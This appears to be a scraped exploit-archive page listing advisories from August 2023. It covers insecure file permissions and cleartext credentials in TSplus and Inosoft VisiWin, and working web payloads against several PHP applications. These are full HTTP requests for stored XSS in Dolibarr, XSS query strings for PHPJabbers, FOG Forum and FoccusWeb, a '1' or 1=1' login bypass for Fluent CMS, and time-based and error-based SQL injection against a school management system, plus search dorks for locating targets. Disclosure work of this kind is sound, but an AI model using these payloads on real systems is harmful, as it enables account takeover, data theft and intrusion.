TSPlus version 16.0.2.14 suffers from an insecure permissions vulnerability.

    # Exploit Title: TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions# Date: 2023-08-09# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia# Vendor Homepage: https://tsplus.net/# Version: Up to 16.0.2.14# Tested on: Windows# CVE : CVE-2023-31067TSplus Remote Access (v. 16.0.2.14) is an alternative to Citrix and Microsoft RDS for remote desktop access and Windows application delivery. Web-enable your legacy apps, create SaaS solutions or remotely access your centralized corporate tools and files.The TSplus Remote Access solution comes with an embedded web server to allow remote users to easely connect remotely.However, insecure file and folder permissions are set and this could allow a malicious user to manipulate file content (e.g.: changing the code of html pages or js scripts) or change legitimate files (e.g. Setup-VirtualPrinter-Client.exe) in order to compromise a system or to gain elevated privileges.This is the list of insecure files and folders with their respective permissions:Everyone:(OI)(CF)(F) and Everyone(F)Permission: Everyone:(OI)(CI)(F)C:\Program Files (x86)\TSplus\Clients\wwwC:\Program Files (x86)\TSplus\Clients\www\addonsC:\Program Files (x86)\TSplus\Clients\www\ConnectionClientC:\Program Files (x86)\TSplus\Clients\www\downloadsC:\Program Files (x86)\TSplus\Clients\www\printsC:\Program Files (x86)\TSplus\Clients\www\RemoteAppClientC:\Program Files (x86)\TSplus\Clients\www\softwareC:\Program Files (x86)\TSplus\Clients\www\varC:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteappC:\Program Files (x86)\TSplus\Clients\www\downloads\sharedC:\Program Files (x86)\TSplus\Clients\www\software\javaC:\Program Files (x86)\TSplus\Clients\www\software\jsC:\Program Files (x86)\TSplus\Clients\www\software\html5\jwresC:\Program Files (x86)\TSplus\Clients\www\software\html5\localesC:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\topmenuC:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\key\partsC:\Program Files (x86)\TSplus\Clients\www\software\java\imgC:\Program Files (x86)\TSplus\Clients\www\software\java\thirdC:\Program Files (x86)\TSplus\Clients\www\software\java\img\cpC:\Program Files (x86)\TSplus\Clients\www\software\java\img\srvC:\Program Files (x86)\TSplus\Clients\www\software\java\third\imagesC:\Program Files (x86)\TSplus\Clients\www\software\java\third\jsC:\Program Files (x86)\TSplus\Clients\www\software\java\third\images\bramusC:\Program Files (x86)\TSplus\Clients\www\software\java\third\js\prototypeC:\Program Files (x86)\TSplus\Clients\www\var\logC:\Program Files (x86)\TSplus\UserDesktop\themesC:\Program Files (x86)\TSplus\UserDesktop\themes\BlueBarC:\Program Files (x86)\TSplus\UserDesktop\themes\DefaultC:\Program Files (x86)\TSplus\UserDesktop\themes\GreyBarC:\Program Files (x86)\TSplus\UserDesktop\themes\LogonC:\Program Files (x86)\TSplus\UserDesktop\themes\MenuOnTopC:\Program Files (x86)\TSplus\UserDesktop\themes\SeamlessC:\Program Files (x86)\TSplus\UserDesktop\themes\ThinClientC:\Program Files (x86)\TSplus\UserDesktop\themes\Vista------------------------------------------------------------------------------Permission: Everyone:(F)C:\Program Files (x86)\TSplus\Clients\www\all.min.cssC:\Program Files (x86)\TSplus\Clients\www\custom.cssC:\Program Files (x86)\TSplus\Clients\www\popins.cssC:\Program Files (x86)\TSplus\Clients\www\robots.txtC:\Program Files (x86)\TSplus\Clients\www\addons\Setup-VirtualPrinter-Client.exeC:\Program Files (x86)\TSplus\Clients\www\cgi-bin\hb.exe.configC:\Program Files (x86)\TSplus\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.configC:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp\index.htmlC:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient\index.htmlC:\Program Files (x86)\TSplus\Clients\www\software\common.cssC:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres\jwwebsockify.jarC:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres\web.jarC:\Program Files (x86)\TSplus\Clients\www\software\html5\own\exitlist.htmlC:\Program Files (x86)\TSplus\Clients\www\software\html5\own\exitupload.htmlC:\Program Files (x86)\TSplus\Clients\www\software\html5\own\getlist.htmlC:\Program Files (x86)\TSplus\Clients\www\software\html5\own\getupload.htmlC:\Program Files (x86)\TSplus\Clients\www\software\html5\own\postupload.htmlC:\Program Files (x86)\TSplus\Clients\www\software\html5\own\uploaderr.htmlC:\Program Files (x86)\TSplus\Clients\www\software\java\index.htmlC:\Program Files (x86)\TSplus\Clients\www\software\java\img\index.htmlC:\Program Files (x86)\TSplus\Clients\www\software\java\img\port.binC:\Program Files (x86)\TSplus\Clients\www\software\java\third\jws.jsC:\Program Files (x86)\TSplus\Clients\www\software\java\third\sha256.jsC:\Program Files (x86)\TSplus\Clients\www\software\java\third\js\prototype\prototype.jsC:\Program Files (x86)\TSplus\Clients\www\software\js\jquery.min.js

TSPlus 16.0.2.14 Insecure Permissions

TSPlus version 16.0.0.0 suffers from an insecure permissions vulnerability.

    # Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions# Date: 2023-08-09# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia# Vendor Homepage: https://tsplus.net/# Version: Up to 16.0.0.0# Tested on: Windows# CVE : CVE-2023-31068With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single sign-on web portal and remote desktop gateway that enables users to remotely access the console session of their office PC.The solution comes with an embedded web server to allow remote users to easely connect remotely.However, insecure file and folder permissions are set, and this could allow a malicious user to manipulate file content (e.g.: changing the code of html pages or js scripts) or change legitimate files (e.g. Setup-RemoteWork-Client.exe) in order to compromise a system or to gain elevated privileges.This is the list of insecure files and folders with their respective permissions:Permission: Everyone:(OI)(CI)(F)C:\Program Files (x86)\TSplus-RemoteWork\Clients\wwwC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-binC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloadC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloadsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\printsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\softwareC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\varC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteappC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads\sharedC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\javaC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\jsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwresC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\localesC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\ownC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\desC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\keyC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\topmenuC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key\partsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\imgC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\thirdC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\cpC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\srvC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\imagesC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\jsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images\bramusC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototypeC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var\log-------------------------------------------------------------------------------------------Permission: Everyone:(F)C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\robots.txtC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\hb.exe.configC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.configC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp\index.htmlC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\common.jsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\lang.jsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\Setup-RemoteWork-Client.exeC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\jwwebsockify.jarC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\web.jarC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitlist.htmlC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitupload.htmlC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\index.htmlC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\index.htmlC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\port.binC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\jws.jsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\sha256.jsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype\prototype.jsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js\jquery.min.js

TSPlus 16.0.0.0 Insecure Permissions

TSPlus version 16.0.0.0 suffers from an insecure credential storage vulnerability.

    # Exploit Title: TSPlus 16.0.0.0 - Remote Work Insecure Credential storage# Date: 2023-08-09# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia# Vendor Homepage: https://tsplus.net/# Version: Up to 16.0.0.0# Tested on: Windows# CVE : CVE-2023-31069With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single sign-on web portal and remote desktop gateway that enables users to remotely access the console session of their office PC.It is possible to create a custom web portal login page which allows a user to login without providing their credentials.However, the credentials are stored in an insecure manner since they are saved in cleartext, within the html login page.This means that everyone with an access to the web login page, can easely retrieve the credentials to access to the application by simply looking at the html code page.This is a code snippet extracted by the source code of the login page (var user and var pass):   // --------------- Access Configuration ---------------   var user = "Admin";                         // Login to use when connecting to the remote server (leave "" to use the login typed in this page)   var pass = "SuperSecretPassword";           // Password to use when connecting to the remote server (leave "" to use the password typed in this page)   var domain = "";                            // Domain to use when connecting to the remote server (leave "" to use the domain typed in this page)   var server = "127.0.0.1";                   // Server to connect to (leave "" to use localhost and/or the server chosen in this page)   var port = "";                              // Port to connect to (leave "" to use localhost and/or the port of the server chosen in this page)   var lang = "as_browser";                    // Language to use   var serverhtml5 = "127.0.0.1";              // Server to connect to, when using HTML5 client   var porthtml5 = "3389";                     // Port to connect to, when using HTML5 client   var cmdline = "";                           // Optional text that will be put in the server's clipboard once connected   // --------------- End of Access Configuration ---------------

TSPlus 16.0.0.0 Insecure Credential Storage

Inosoft VisiWin 7 version 2022-2.1 suffers from a privilege escalation vulnerability.

    # Exploit Title: Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions Privilege Escalation# Date: 2023-08-09# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia# Vendor Homepage: https://www.inosoft.com/# Version: Up to 2022-2.1 (Runtime RT7.3 RC3 20221209.5)# Tested on: Windows# CVE: CVE-2023-31468Inosoft VisiWin is a completely open system with a configurable range of functions. It combines all features of classic HMI software with unlimited programming possibilities.The installation of the solution will create insecure folder, and this could allow a malicious user to manipulate file content or change legitimate files (e.g., VisiWin7.Server.Manager.exe which runs with SYSTEM privileges) to compromise a system or to gain elevated privileges.This is the list of insecure files and folders with their respective permissions:C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH"C:\Program Files (x86)\INOSOFT GmbH BUILTIN\Administrators:(OI)(CI)(F)                                     Everyone:(OI)(CI)(F)                                     NT AUTHORITY\SYSTEM:(OI)(CI)(F)Successfully processed 1 files; Failed processing 0 filesC:\>--------------------------------------------------------------------------------------------------------------------------------------------------------C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH\VisiWin7\Runtime\VisiWin7.Server.Manager.exe"C:\Program Files (x86)\INOSOFT GmbH\VisiWin 7\Runtime\VisiWin7.Server.Manager.exe BUILTIN\Administrators:(I)(F)                                                                                    Everyone:(I)(F)                                                                                    NT AUTHORITY\SYSTEM:(I)(F)Successfully processed 1 files; Failed processing 0 filesC:\>

Inosoft VisiWin 7 2022-2.1 Insecure Permissions / Privilege Escalation

Dolibarr version 17.0.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Dolibarr Version 17.0.1 - Stored XSS# Dork: # Date: 2023-08-09# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php# Version: 17.0.1 (REQUIRED)# Tested on: Windows/Linux# CVE : -----------------------------------------------------------------------------RequestsPOST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1Host: 127.0.0.1Content-Length: 599Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1Accept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2ehtConnection: closetoken=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir

Dolibarr 17.0.1 Cross Site Scripting

PHPJabbers Business Directory Script version 3.2 suffers from cross site request forgery and cross site scripting vulnerabilities.

**PHPJabbers Business Directory Script 3.2 Cross Site Request Forgery / Cross Site Scripting**

    # Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities# Date: 09/08/2023# Exploit Author: Kerimcan Ozturk# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/business-directory-script/# Version: 3.2# Tested on: Windows 10 Pro## DescriptionTechnical Detail / POC==========================Login AccountGo to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57)[1] Cross-Site Scripting (XSS)Request:https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id="<script><image/src/onerror=prompt(8)>[2] Cross-Site Request ForgeryRequest:https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id="<script><font%20color="green">Kerimcan%20Ozturk</font>Best Regards

PHPJabbers Business Directory Script 3.2 Cross Site Request Forgery / Cross Site Scripting

FOG Forum version 0.8 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : FOG Forum v0.8 XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://fogproject.org/                                                                                            || # Dork      : Powered by FOG Forum 0.8                                                                                           |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  This vulnerability affects : /forum/fen.php. [+]  Attack details :     URI was set to ;904045'():;984994     The input is reflected inside <script> tag between single quotes.[+]  This vulnerability affects /forum/index.php.  [+]  Attack details :     URL encoded GET input fog_action was set to 1" onmouseover=prompt(984696) bad="     The input is reflected inside a tag parameter between double quotes.Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FOG Forum 0.8 Cross Site Scripting

FoccusWeb CMS version 0.1 suffers from a cross site scripting vulnerability.

**FoccusWeb CMS 0.1 Cross Site Scripting**

Posted Aug 22, 2023

Authored by indoushka

FoccusWeb CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 4ec7d01c602a400932502d010a16a7b1bacb2f323fbd9f44c16aef7baacd0231

Download | Favorite | View

**FoccusWeb CMS 0.1 Cross Site Scripting**

    ======================================================================================================================================| # Title     : FoccusWeb CMS v0.1 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                               | | # Vendor    : http://www.foccusweb.com/site/                                                                                       |  ======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /resultados.html?txt-busca=1<script>alert(/indoushka/);</script>&yt0=submit[+] http://127.0.0.1/saogabrielrsgovbr/Portal/busca/resultados.html?txt-busca=1%3Cscript%3Ealert(/indoushka/);%3C/script%3E&yt0=submitGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,996)
*   Arbitrary (16,211)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,452)
*   Encryption (2,370)
*   Exploit (51,936)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,782)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,795)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,185)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,380)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,786)
*   Web (9,669)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,949)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,494)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,741)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,834)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

FoccusWeb CMS 0.1 Cross Site Scripting

Fluent CMS version 1.0.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Fluent CMS V 1.0.0 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 77.0.1(32-bit)                                             | | # Vendor    : http://www.fluenttechnology.com/                                                                                   |  | # Dork      : "Developed By - Fluent Technology"                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : User & Pass : 1' or 1=1 -- -[+] admin Panel : /fluentcms/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Fluent CMS 1.0.0 SQL Injection

Global Multi School Management System Express version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title:  Global - Multi School Management System Express v1.0- SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /report/balance HTTP/1.1Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcwAccept: */*X-Requested-With: XMLHttpRequestReferer: http://localhostCookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469fContent-Length: 472Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive------------YWJkMTQzNDcwContent-Disposition: form-data; name="school_id"0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z------------YWJkMTQzNDcwContent-Disposition: form-data; name="academic_year_id"------------YWJkMTQzNDcwContent-Disposition: form-data; name="group_by"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_from"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_to"------------YWJkMTQzNDcw--### Parameter & Payloads ###Parameter: MULTIPART school_id ((custom) POST)Type: error-basedTitle: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BYclause (EXTRACTVALUE)Payload: ------------YWJkMTQzNDcwContent-Disposition: form-data; name="school_id"0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' ANDEXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx------------YWJkMTQzNDcwContent-Disposition: form-data; name="academic_year_id"------------YWJkMTQzNDcwContent-Disposition: form-data; name="group_by"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_from"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_to"------------YWJkMTQzNDcw–

Tag

#windows